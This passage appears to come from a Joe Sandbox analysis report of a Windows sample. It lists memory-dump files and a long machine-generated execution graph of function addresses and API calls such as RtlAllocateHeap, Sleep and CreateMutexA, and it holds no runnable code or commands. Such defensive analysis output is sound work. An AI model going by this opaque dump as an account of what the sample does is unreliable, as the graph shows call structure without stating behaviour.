                                                                                                                                                                                            • Associated: 00000000.00000002.1457802488.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457813801.0000000000907000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458357790.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458376642.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458392856.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458420879.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458626713.0000000000A85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458645187.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458657521.0000000000A88000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458929915.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458945923.0000000000A8B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458960976.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458977774.0000000000A9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458989840.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459005401.0000000000AB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459024005.0000000000AB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459038850.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459055488.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459072461.0000000000ADE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459086887.0000000000AE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459101565.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459116097.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459131565.0000000000AF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459144829.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459158858.0000000000AF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459171112.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459184882.0000000000B05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459199433.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459214292.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459227978.0000000000B13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459240014.0000000000B14000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459252716.0000000000B16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459264586.0000000000B17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459278527.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459291171.0000000000B23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459305143.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459320428.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459333285.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459345440.0000000000B34000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459359173.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459379108.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459393452.0000000000B44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459405663.0000000000B45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459460215.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459485889.0000000000B92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459501980.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459515010.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459532625.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459545214.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_890000_file.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 531285432-0
                                                                                                                                                                                            • Opcode ID: 064ef255a3dbae330f927e7e1ba73c52f12158b0b6db0483c964b948dcc8beae
                                                                                                                                                                                            • Instruction ID: 3094bd3952845d9b34cc0e171afd531fb37c96958872b54bb8e5342164226aac
                                                                                                                                                                                            • Opcode Fuzzy Hash: 064ef255a3dbae330f927e7e1ba73c52f12158b0b6db0483c964b948dcc8beae
                                                                                                                                                                                            • Instruction Fuzzy Hash: 50211D71A00119AFEF00EBA8DC819BEB7B9FF49710F100419F601EB251DB749D419BA1

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:0.9%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                            Total number of Nodes:1843
                                                                                                                                                                                            Total number of Limit Nodes:15
                                                                                                                                                                                            execution_graph 9831 601860 9832 6180c0 RtlAllocateHeap 9831->9832 9833 601871 9832->9833 9836 61d64e 9833->9836 9839 61d621 9836->9839 9840 61d630 9839->9840 9841 61d637 9839->9841 9845 63988e 9840->9845 9848 6398fa 9841->9848 9844 60187b 9846 6398fa RtlAllocateHeap 9845->9846 9847 6398a0 9846->9847 9847->9844 9851 639630 9848->9851 9850 63992b 9850->9844 9852 63963c __dosmaperr 9851->9852 9855 63968b 9852->9855 9854 639657 9854->9850 9856 6396a7 9855->9856 9858 63971e __dosmaperr 9855->9858 9857 6396fe 9856->9857 9856->9858 9865 63edf6 9856->9865 9857->9858 9859 63edf6 RtlAllocateHeap 9857->9859 9858->9854 9861 639714 9859->9861 9863 63adf5 __freea RtlAllocateHeap 9861->9863 9862 6396f4 9864 63adf5 __freea RtlAllocateHeap 9862->9864 9863->9858 9864->9857 9866 63ee03 9865->9866 9867 63ee1e 9865->9867 9866->9867 9868 63ee0f 9866->9868 9869 63ee2d 9867->9869 9874 644fdc 9867->9874 9870 6375f6 __dosmaperr RtlAllocateHeap 9868->9870 9881 64500f 9869->9881 9872 63ee14 __cftof 9870->9872 9872->9862 9875 644fe7 9874->9875 9876 644ffc 9874->9876 9877 6375f6 __dosmaperr RtlAllocateHeap 9875->9877 9876->9869 9878 644fec 9877->9878 9879 636c5a ___std_exception_copy RtlAllocateHeap 9878->9879 9880 644ff7 9879->9880 9880->9869 9882 645027 9881->9882 9883 64501c 9881->9883 9885 64502f 9882->9885 9887 645038 __dosmaperr 9882->9887 9890 63b04b 9883->9890 9886 63adf5 __freea RtlAllocateHeap 9885->9886 9889 645024 9886->9889 9888 6375f6 __dosmaperr RtlAllocateHeap 9887->9888 9887->9889 9888->9889 9889->9872 9891 63b059 __dosmaperr 9890->9891 9892 6375f6 __dosmaperr RtlAllocateHeap 9891->9892 9893 63b087 9891->9893 9892->9893 9893->9889 9938 604276 9943 602410 9938->9943 9942 60428f 9944 602424 9943->9944 9958 61b52d 9944->9958 9947 603ce0 9948 603d42 9947->9948 9951 603d52 9947->9951 10061 617d50 9948->10061 9950 61d3e2 RtlAllocateHeap 9952 603d84 9950->9952 9951->9950 9953 617d50 RtlAllocateHeap 9952->9953 9955 603e03 9952->9955 9953->9955 9954 603e9b shared_ptr 9954->9942 9955->9954 9956 636c6a RtlAllocateHeap 9955->9956 9957 603ec1 9956->9957 9966 633aed 9958->9966 9960 61b5a5 ___std_exception_copy 9973 61b1ad 9960->9973 9961 61b598 9969 61af56 9961->9969 9965 60242a 9965->9947 9977 634f29 9966->9977 9970 61af9f ___std_exception_copy 9969->9970 9972 61afb2 shared_ptr 9970->9972 10037 61b39f 9970->10037 9972->9965 9974 61b1e1 shared_ptr 9973->9974 9975 61b1d8 9973->9975 9974->9965 9976 61b39f 5 API calls 9975->9976 9976->9974 9985 634f37 9977->9985 9979 61b555 9979->9960 9979->9961 9979->9965 9980 634f2e __cftof 9980->9979 9984 638bfc ___std_exception_copy 9980->9984 9990 63d634 9980->9990 10011 6365ed 9984->10011 9986 634f40 9985->9986 9988 634f43 9985->9988 9986->9980 9987 634f77 9987->9980 9988->9987 9989 638ba3 ___std_exception_destroy RtlAllocateHeap 9988->9989 9989->9987 9991 63d640 __dosmaperr 9990->9991 9992 63a7c8 __dosmaperr RtlAllocateHeap 9991->9992 9996 63d667 __cftof 9991->9996 9998 63d66d __cftof __dosmaperr 9991->9998 9992->9996 9993 63d6b2 9994 6375f6 __dosmaperr RtlAllocateHeap 9993->9994 9995 63d6b7 9994->9995 9997 636c5a ___std_exception_copy RtlAllocateHeap 9995->9997 9996->9993 9996->9998 10010 63d69c 9996->10010 9997->10010 9999 63d726 9998->9999 10000 63d81b __dosmaperr 9998->10000 10002 63d751 __cftof 9998->10002 9999->10002 10014 63d62b 9999->10014 10001 6365ed __cftof 3 API calls 10000->10001 10003 63d82e 10001->10003 10008 63d7a5 10002->10008 10002->10010 10017 63a671 10002->10017 10007 63d62b __cftof 4 API calls 10007->10002 10009 63a671 __cftof 4 API calls 10008->10009 10008->10010 10009->10010 10010->9984 10012 6364c7 __cftof 3 API calls 10011->10012 10013 6365fe 10012->10013 10015 63a671 __cftof 4 API calls 10014->10015 10016 63d630 10015->10016 10016->10007 10018 63a67b __dosmaperr 10017->10018 10019 63d82f __dosmaperr RtlAllocateHeap 10018->10019 10021 63a694 10018->10021 10023 63a6bc __dosmaperr 10019->10023 10020 63a6c4 __dosmaperr 10027 63adf5 __freea RtlAllocateHeap 10020->10027 10022 63a722 10021->10022 10031 638bec 10021->10031 10022->10008 10023->10020 10025 63a6fc 10023->10025 10026 63a49f __dosmaperr RtlAllocateHeap 10025->10026 10029 63a707 10026->10029 10027->10021 10030 63adf5 __freea RtlAllocateHeap 10029->10030 10030->10021 10032 638bf1 __cftof 10031->10032 10033 63d634 __cftof 4 API calls 10032->10033 10034 638bfc ___std_exception_copy 10032->10034 10033->10034 10035 6365ed __cftof 3 API calls 10034->10035 10036 638c2f 10035->10036 10048 61bedf 10037->10048 10040 61b3e8 10040->9972 10057 61cc31 10048->10057 10051 636cbb 10052 636cc7 __dosmaperr 10051->10052 10053 63a671 __cftof 4 API calls 10052->10053 10056 636ccc 10053->10056 10054 638bec __cftof 4 API calls 10055 636cf6 10054->10055 10056->10054 10058 61cc3f InitOnceExecuteOnce 10057->10058 10060 61b3e1 10057->10060 10058->10060 10060->10040 10060->10051 10062 617d62 10061->10062 10063 617dcb 10061->10063 10065 617d6d 10062->10065 10066 617d9c 10062->10066 10064 602480 RtlAllocateHeap 10063->10064 10067 617d7a 10064->10067 10065->10063 10068 617d74 10065->10068 10069 617db9 10066->10069 10072 61d3e2 RtlAllocateHeap 10066->10072 10070 636c6a RtlAllocateHeap 10067->10070 10074 617d83 10067->10074 10071 61d3e2 RtlAllocateHeap 10068->10071 10069->9951 10078 617dd5 10070->10078 10071->10067 10073 617da6 10072->10073 10073->9951 10074->9951 10075 617f20 10076 619270 RtlAllocateHeap 10075->10076 10089 617e91 __cftof 10076->10089 10077 617e01 10077->9951 10078->10075 10078->10077 10079 617f1b 10078->10079 10081 617e80 10078->10081 10082 617ea7 10078->10082 10083 602480 RtlAllocateHeap 10079->10083 10080 636c6a RtlAllocateHeap 10087 617f2a __cftof 10080->10087 10081->10079 10084 617e8b 10081->10084 10086 61d3e2 RtlAllocateHeap 10082->10086 10082->10089 10083->10075 10085 61d3e2 RtlAllocateHeap 10084->10085 10085->10089 10086->10089 10088 617f61 shared_ptr 10087->10088 10090 636c6a RtlAllocateHeap 10087->10090 10088->9951 10089->10080 10091 617f02 shared_ptr 10089->10091 10092 617f7c 10090->10092 10091->9951 10093 60a079 10094 60a081 shared_ptr 10093->10094 10095 60a930 10094->10095 10096 60a154 shared_ptr 10094->10096 10097 636c6a RtlAllocateHeap 10095->10097 10099 6180c0 RtlAllocateHeap 10096->10099 10098 60a953 Sleep CreateMutexA 10097->10098 10101 60a98e 10098->10101 10100 60a903 10099->10100 10102 60cc79 10103 60cc84 shared_ptr 10102->10103 10104 60ccda shared_ptr __floor_pentium4 10103->10104 10105 636c6a RtlAllocateHeap 10103->10105 10106 60ce36 10105->10106 10112 617a00 10106->10112 10108 60ce92 10126 605c10 10108->10126 10110 60ce9d 10177 60ca70 10110->10177 10113 617a26 10112->10113 10114 617a2d 10113->10114 10115 617a81 10113->10115 10116 617a62 10113->10116 10114->10108 10119 61d3e2 RtlAllocateHeap 10115->10119 10123 617a76 __cftof 10115->10123 10117 617ab9 10116->10117 10118 617a69 10116->10118 10120 602480 RtlAllocateHeap 10117->10120 10121 61d3e2 RtlAllocateHeap 10118->10121 10119->10123 10122 617a6f 10120->10122 10121->10122 10122->10123 10124 636c6a RtlAllocateHeap 10122->10124 10123->10108 10125 617ac3 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 10124->10125 10125->10108 10197 605940 10126->10197 10128 605c54 10200 604b30 10128->10200 10131 605d17 shared_ptr __floor_pentium4 10131->10110 10132 636c6a RtlAllocateHeap 10133 605d47 __cftof 10132->10133 10133->10133 10134 6180c0 RtlAllocateHeap 10133->10134 10136 605e3e 10134->10136 10135 605ea6 shared_ptr __floor_pentium4 10135->10110 10136->10135 10137 636c6a RtlAllocateHeap 10136->10137 10138 605ed2 10137->10138 10139 605ffe shared_ptr __floor_pentium4 10138->10139 10140 636c6a RtlAllocateHeap 10138->10140 10139->10110 10141 60601b 10140->10141 10142 6180c0 RtlAllocateHeap 10141->10142 10143 606089 10142->10143 10144 6180c0 RtlAllocateHeap 10143->10144 10145 6060bd 10144->10145 10146 6180c0 RtlAllocateHeap 10145->10146 10147 6060ee 10146->10147 10148 6180c0 RtlAllocateHeap 10147->10148 10149 60611f 10148->10149 10150 6180c0 RtlAllocateHeap 10149->10150 10152 606150 10150->10152 10151 6065b1 shared_ptr __floor_pentium4 10151->10110 10152->10151 10153 636c6a RtlAllocateHeap 10152->10153 10154 6065dc 10153->10154 10155 617a00 RtlAllocateHeap 10154->10155 10156 6066a6 10155->10156 10157 605c10 4 API calls 10156->10157 10158 6066ac 10157->10158 10159 605c10 4 API calls 10158->10159 10160 6066b1 10159->10160 10207 6022c0 10160->10207 10162 6066c9 shared_ptr 10163 617a00 RtlAllocateHeap 10162->10163 10164 606732 10163->10164 10165 605c10 4 API calls 10164->10165 10166 60673d 10165->10166 10167 6022c0 4 API calls 10166->10167 10176 606757 shared_ptr 10167->10176 10168 606852 10169 6180c0 RtlAllocateHeap 10168->10169 10171 60689c 10169->10171 10170 617a00 RtlAllocateHeap 10170->10176 10172 6180c0 RtlAllocateHeap 10171->10172 10174 6068e3 shared_ptr __floor_pentium4 10172->10174 10173 605c10 4 API calls 10173->10176 10174->10110 10175 6022c0 4 API calls 10175->10176 10176->10168 10176->10170 10176->10173 10176->10175 10178 60cadd 10177->10178 10180 617a00 RtlAllocateHeap 10178->10180 10183 60cc87 10178->10183 10179 60ccda shared_ptr __floor_pentium4 10181 60ccee 10180->10181 10182 605c10 4 API calls 10181->10182 10184 60ccf9 10182->10184 10183->10179 10185 636c6a RtlAllocateHeap 10183->10185 10653 609030 10184->10653 10187 60ce36 10185->10187 10189 617a00 RtlAllocateHeap 10187->10189 10188 60cd0d 10666 618220 10188->10666 10191 60ce92 10189->10191 10193 605c10 4 API calls 10191->10193 10192 60cd1f 10674 618f40 10192->10674 10194 60ce9d 10193->10194 10195 60ca70 4 API calls 10194->10195 10210 617f80 10197->10210 10199 60596b 10199->10128 10201 604dc2 10200->10201 10205 604b92 10200->10205 10201->10131 10201->10132 10203 604ce5 10203->10201 10204 618ca0 RtlAllocateHeap 10203->10204 10204->10203 10205->10203 10225 636da6 10205->10225 10230 618ca0 10205->10230 10367 602280 10207->10367 10212 617fc7 10210->10212 10214 617f9e __cftof 10210->10214 10211 6180b3 10213 619270 RtlAllocateHeap 10211->10213 10212->10211 10217 61801b 10212->10217 10218 61803e 10212->10218 10215 6180b8 10213->10215 10214->10199 10216 602480 RtlAllocateHeap 10215->10216 10219 6180bd 10216->10219 10217->10215 10221 61d3e2 RtlAllocateHeap 10217->10221 10220 61d3e2 RtlAllocateHeap 10218->10220 10223 61802c __cftof 10218->10223 10220->10223 10221->10223 10222 636c6a RtlAllocateHeap 10222->10211 10223->10222 10224 618095 shared_ptr 10223->10224 10224->10199 10226 636db4 10225->10226 10227 636dc2 10225->10227 10245 636d19 10226->10245 10227->10205 10231 618cc3 10230->10231 10232 618dc9 10230->10232 10236 618d05 10231->10236 10237 618d2f 10231->10237 10233 619270 RtlAllocateHeap 10232->10233 10234 618dce 10233->10234 10235 602480 RtlAllocateHeap 10234->10235 10243 618d16 __cftof 10235->10243 10236->10234 10238 618d10 10236->10238 10239 61d3e2 RtlAllocateHeap 10237->10239 10237->10243 10241 61d3e2 RtlAllocateHeap 10238->10241 10239->10243 10240 636c6a RtlAllocateHeap 10242 618dd8 10240->10242 10241->10243 10243->10240 10244 618d8b shared_ptr __cftof 10243->10244 10244->10205 10250 63690a 10245->10250 10249 636d3d 10249->10205 10251 63692a 10250->10251 10252 636921 10250->10252 10251->10252 10253 63a671 __cftof 4 API calls 10251->10253 10258 636d52 10252->10258 10254 63694a 10253->10254 10264 63b5fb 10254->10264 10259 636d8f 10258->10259 10260 636d5f 10258->10260 10351 63b67d 10259->10351 10261 636d6e 10260->10261 10346 63b6a1 10260->10346 10261->10249 10265 636960 10264->10265 10266 63b60e 10264->10266 10268 63b628 10265->10268 10266->10265 10272 63f5ab 10266->10272 10269 63b650 10268->10269 10270 63b63b 10268->10270 10269->10252 10270->10269 10285 63e6b1 10270->10285 10273 63f5b7 __dosmaperr 10272->10273 10274 63a671 __cftof 4 API calls 10273->10274 10275 63f5c0 __dosmaperr 10274->10275 10278 63f606 10275->10278 10281 63f62c 10275->10281 10277 63f5ef __cftof 10277->10278 10279 638bec __cftof 4 API calls 10277->10279 10278->10265 10280 63f62b 10279->10280 10282 63f647 10281->10282 10283 63f63a __dosmaperr 10281->10283 10282->10277 10283->10282 10284 63f35f __dosmaperr RtlAllocateHeap 10283->10284 10284->10282 10286 63a671 __cftof 4 API calls 10285->10286 10287 63e6bb 10286->10287 10290 63e5c9 10287->10290 10289 63e6c1 10289->10269 10295 63e5d5 __dosmaperr 10290->10295 10291 63e5f6 10291->10289 10292 638bec __cftof 4 API calls 10293 63e668 10292->10293 10294 63e6a4 10293->10294 10301 63a72e 10293->10301 10294->10289 10297 63adf5 __freea RtlAllocateHeap 10295->10297 10299 63e5ef __cftof 10295->10299 10297->10299 10299->10291 10299->10292 10302 63a739 __dosmaperr 10301->10302 10303 63a745 10302->10303 10304 63d82f __dosmaperr RtlAllocateHeap 10302->10304 10305 638bec __cftof 4 API calls 10303->10305 10307 63a7be 10303->10307 10308 63a769 __dosmaperr 10304->10308 10306 63a7c7 10305->10306 10315 63e4b0 10307->10315 10309 63a7a5 10308->10309 10310 63a771 __dosmaperr 10308->10310 10311 63a49f __dosmaperr RtlAllocateHeap 10309->10311 10312 63adf5 __freea RtlAllocateHeap 10310->10312 10313 63a7b0 10311->10313 10312->10303 10314 63adf5 __freea RtlAllocateHeap 10313->10314 10314->10303 10316 63e5c9 __cftof 4 API calls 10315->10316 10317 63e4c3 10316->10317 10334 63e259 10317->10334 10320 63e4dc 10320->10294 10321 63b04b __cftof RtlAllocateHeap 10322 63e4ed 10321->10322 10323 63e51f 10322->10323 10337 63e6c4 10322->10337 10326 63adf5 __freea RtlAllocateHeap 10323->10326 10325 63e512 10327 63e51a 10325->10327 10331 63e535 __cftof 10325->10331 10328 63e52d 10326->10328 10329 6375f6 __dosmaperr RtlAllocateHeap 10327->10329 10328->10294 10329->10323 10330 63e561 10330->10323 10342 63e14b 10330->10342 10331->10330 10332 63adf5 __freea RtlAllocateHeap 10331->10332 10332->10330 10335 63690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10334->10335 10336 63e26b 10335->10336 10336->10320 10336->10321 10338 63e259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10337->10338 10341 63e6e4 __cftof 10338->10341 10339 63e75a __cftof __floor_pentium4 10339->10325 10340 63e32f __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10340->10339 10341->10339 10341->10340 10343 63e157 __dosmaperr 10342->10343 10344 63e198 __cftof RtlAllocateHeap 10343->10344 10345 63e16e __cftof 10344->10345 10345->10323 10347 63690a __cftof 4 API calls 10346->10347 10348 63b6be 10347->10348 10350 63b6ce __floor_pentium4 10348->10350 10356 63f1bf 10348->10356 10350->10261 10352 63a671 __cftof 4 API calls 10351->10352 10353 63b688 10352->10353 10354 63b5fb __cftof 4 API calls 10353->10354 10355 63b698 10354->10355 10355->10261 10357 63690a __cftof 4 API calls 10356->10357 10358 63f1df __cftof 10357->10358 10359 63f29d __floor_pentium4 10358->10359 10360 63b04b __cftof RtlAllocateHeap 10358->10360 10362 63f232 __cftof 10358->10362 10359->10350 10360->10362 10363 63f2c2 10362->10363 10364 63f2df 10363->10364 10365 63f2ce 10363->10365 10364->10359 10365->10364 10366 63adf5 __freea RtlAllocateHeap 10365->10366 10366->10364 10368 602296 10367->10368 10371 6387f8 10368->10371 10374 637609 10371->10374 10373 6022a4 10373->10162 10375 637631 10374->10375 10376 637649 10374->10376 10377 6375f6 __dosmaperr RtlAllocateHeap 10375->10377 10376->10375 10378 637651 10376->10378 10379 637636 10377->10379 10380 63690a __cftof 4 API calls 10378->10380 10381 636c5a ___std_exception_copy RtlAllocateHeap 10379->10381 10382 637661 10380->10382 10383 637641 __floor_pentium4 10381->10383 10387 637bc4 10382->10387 10383->10373 10403 63868d 10387->10403 10389 6376e8 10400 637a19 10389->10400 10390 637be4 10391 6375f6 __dosmaperr RtlAllocateHeap 10390->10391 10392 637be9 10391->10392 10393 636c5a ___std_exception_copy RtlAllocateHeap 10392->10393 10393->10389 10394 637bd5 10394->10389 10394->10390 10410 637d15 10394->10410 10418 638168 10394->10418 10423 637dc2 10394->10423 10428 637de8 10394->10428 10457 637f36 10394->10457 10401 63adf5 __freea RtlAllocateHeap 10400->10401 10402 637a29 10401->10402 10402->10383 10404 638692 10403->10404 10405 6386a5 10403->10405 10406 6375f6 __dosmaperr RtlAllocateHeap 10404->10406 10405->10394 10407 638697 10406->10407 10408 636c5a ___std_exception_copy RtlAllocateHeap 10407->10408 10409 6386a2 10408->10409 10409->10394 10479 637d34 10410->10479 10412 637d1a 10413 637d31 10412->10413 10414 6375f6 __dosmaperr RtlAllocateHeap 10412->10414 10413->10394 10415 637d23 10414->10415 10416 636c5a ___std_exception_copy RtlAllocateHeap 10415->10416 10417 637d2e 10416->10417 10417->10394 10419 638171 10418->10419 10420 638178 10418->10420 10488 637b50 10419->10488 10420->10394 10424 637dd2 10423->10424 10425 637dcb 10423->10425 10424->10394 10426 637b50 4 API calls 10425->10426 10427 637dd1 10426->10427 10427->10394 10429 637e09 10428->10429 10430 637def 10428->10430 10432 6375f6 __dosmaperr RtlAllocateHeap 10429->10432 10443 637e39 10429->10443 10431 637fbb 10430->10431 10436 637f4f 10430->10436 10430->10443 10433 637f92 10431->10433 10437 637fc2 10431->10437 10438 638001 10431->10438 10434 637e25 10432->10434 10454 637f77 10433->10454 10456 637f8b 10433->10456 10532 638420 10433->10532 10435 636c5a ___std_exception_copy RtlAllocateHeap 10434->10435 10442 637e30 10435->10442 10436->10433 10446 637f5b 10436->10446 10440 637fc7 10437->10440 10441 637f69 10437->10441 10547 638604 10438->10547 10440->10433 10445 637fcc 10440->10445 10441->10454 10441->10456 10541 638241 10441->10541 10442->10394 10443->10394 10444 637fa2 10444->10456 10518 638390 10444->10518 10449 637fd1 10445->10449 10450 637fdf 10445->10450 10446->10441 10446->10444 10446->10454 10449->10456 10522 6385e5 10449->10522 10526 638571 10450->10526 10454->10456 10550 6386ea 10454->10550 10456->10394 10458 637fbb 10457->10458 10459 637f4f 10457->10459 10460 637fc2 10458->10460 10461 638001 10458->10461 10465 637f92 10458->10465 10459->10465 10466 637f5b 10459->10466 10462 637fc7 10460->10462 10471 637f69 10460->10471 10463 638604 RtlAllocateHeap 10461->10463 10464 637fcc 10462->10464 10462->10465 10476 637f77 10463->10476 10469 637fdf 10464->10469 10472 637fd1 10464->10472 10467 638420 RtlAllocateHeap 10465->10467 10465->10476 10478 637f8b 10465->10478 10470 637fa2 10466->10470 10466->10471 10466->10476 10467->10476 10468 638241 4 API calls 10468->10476 10473 638571 RtlAllocateHeap 10469->10473 10474 638390 4 API calls 10470->10474 10470->10478 10471->10468 10471->10476 10471->10478 10475 6385e5 RtlAllocateHeap 10472->10475 10472->10478 10473->10476 10474->10476 10475->10476 10477 6386ea 4 API calls 10476->10477 10476->10478 10477->10478 10478->10394 10482 637d5e 10479->10482 10481 637d40 10481->10412 10484 637d80 10482->10484 10483 637db7 10483->10481 10484->10483 10485 6375f6 __dosmaperr RtlAllocateHeap 10484->10485 10486 637dac 10485->10486 10487 636c5a ___std_exception_copy RtlAllocateHeap 10486->10487 10487->10483 10489 637b62 10488->10489 10490 637b67 10488->10490 10491 6375f6 __dosmaperr RtlAllocateHeap 10489->10491 10496 638ab6 10490->10496 10491->10490 10494 6375f6 __dosmaperr RtlAllocateHeap 10495 637b99 10494->10495 10495->10394 10497 638ad1 10496->10497 10500 638868 10497->10500 10501 63868d RtlAllocateHeap 10500->10501 10504 63887a 10501->10504 10502 6388b3 10503 63690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10502->10503 10510 6388bf 10503->10510 10504->10502 10505 63888f 10504->10505 10517 637b85 10504->10517 10506 6375f6 __dosmaperr RtlAllocateHeap 10505->10506 10507 638894 10506->10507 10509 636c5a ___std_exception_copy RtlAllocateHeap 10507->10509 10508 636d52 GetPEB ExitProcess GetPEB RtlAllocateHeap 10508->10510 10509->10517 10510->10508 10511 6388ee 10510->10511 10513 638a8d RtlAllocateHeap 10511->10513 10514 638958 10511->10514 10512 638a8d RtlAllocateHeap 10515 638a20 10512->10515 10513->10514 10514->10512 10516 6375f6 __dosmaperr RtlAllocateHeap 10515->10516 10515->10517 10516->10517 10517->10494 10517->10495 10520 6383ab 10518->10520 10519 6383dd 10519->10454 10520->10519 10554 63c88e 10520->10554 10523 6385f1 10522->10523 10524 638420 RtlAllocateHeap 10523->10524 10525 638603 10524->10525 10525->10454 10531 638586 10526->10531 10527 6375f6 __dosmaperr RtlAllocateHeap 10528 63858f 10527->10528 10529 636c5a ___std_exception_copy RtlAllocateHeap 10528->10529 10530 63859a 10529->10530 10530->10454 10531->10527 10531->10530 10534 638433 10532->10534 10533 638465 10540 63845e 10533->10540 10578 63779f 10533->10578 10534->10533 10535 63844e 10534->10535 10536 6375f6 __dosmaperr RtlAllocateHeap 